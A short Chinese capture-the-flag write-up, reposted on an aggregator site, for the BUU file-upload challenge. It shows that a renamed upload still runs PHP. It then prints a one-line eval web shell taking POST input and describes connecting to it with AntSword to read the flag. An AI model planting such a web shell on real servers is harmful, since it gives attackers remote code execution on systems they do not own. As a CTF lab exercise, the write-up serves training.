BUU UPLOAD COURSE 1 1（一句话木马+蚁剑）

Posted 2022-11-23 MangataTS

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了BUU UPLOAD COURSE 1 1（一句话木马+蚁剑）相关的知识，希望对你有一定的参考价值。

题目链接

我们随便传一张图片试试：

我们发现它给我们重命名了，然后我们再打开试试：

于是我们传入一个php代码试试

<?php
echo "hello world";
?>

我们发现，虽然文件重命名了，但是还是可以执行php代码，于是上传一句话木马，然后蚁剑链接即可

<?php 
@eval($_POST[456]);
?>

最后flag在网站的根目录~

注意的是，这里也可以不通过蚁剑链接，而是一句话木马然后接受shell脚本或者php代码，然后通过发送post或者get请求的方式进行搜索

以上是关于BUU UPLOAD COURSE 1 1（一句话木马+蚁剑）的主要内容，如果未能解决你的问题，请参考以下文章